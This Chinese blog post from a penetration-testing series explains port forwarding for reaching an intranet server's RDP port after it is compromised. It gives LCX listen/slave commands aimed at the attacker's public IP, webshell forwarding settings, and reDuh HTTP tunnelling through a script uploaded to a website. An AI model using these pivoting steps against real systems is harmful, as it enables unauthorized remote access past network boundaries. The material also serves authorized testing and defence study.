[渗透测试] 端口转发

如果服务器在内网中,一般情况下攻击者无法连接,但是如果其拥有服务器权限后,就可以使用端口转发技术。

一、LCX转发
首先在攻击者自己的机器上执行如下命令:
lcx -listen 500 8888
随后在被攻击的计算机上执行以下命令:
lcx.exe -slave [攻击者公网IP] 500 127.0.0.1 3389
最后攻击者利用“127.0.0.1:8888”就可以连接到终端。

二、使用Shell脚本自带端口转发功能
此功能节约了上传LCX的时间
首先还是要在攻击者端执行lcx -listen 500 8888
在webshell的脚本转发位置进行如下设置:
本地IP:127.0.0.1
本地端口:3389
远程IP:(设置成攻击者IP)
远程端口:500
最后在攻击者端执行“127.0.0.1:8888”

三、reDuh转发
reDuh被称为内网渗透利器,可以将内网的端口以HTTP/HTTPS隧道的方式转发到本机。
reDuh的客户端由Java编写,使用时必须先安装JRE环境。reDuh GUI是一个C++的Windows GUI版本,使用起来更方便。
将程序自带的服务器脚本上传至网站,网站支持哪种语言就上传哪种版本。
随后打开reDuh GUI界面,在URL输入框里输入连接(刚刚上传脚本文件所在的URL),点击Start。这一步成功后可继续设置其他项目。
在“Remote Host”中输入“127.0.0.1”.“Remote Port”中输入要转发的端口3389,在“Local Port”输入本地连接的端口,然后点击“Create”按钮,即可创建HTTP/HTTPS隧道,在右侧会显示连接信息。
隧道创建后,就可以连接终端,连接方式仍为“127.0.0.1:8888”
阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/hitwangpeng/article/details/46850329
个人分类: 渗透测试
上一篇[渗透测试] PcAnywhere提权
下一篇[渗透测试] 旁注攻击
博主设置当前文章不允许评论。

没有更多推荐了,返回首页

关闭
关闭
关闭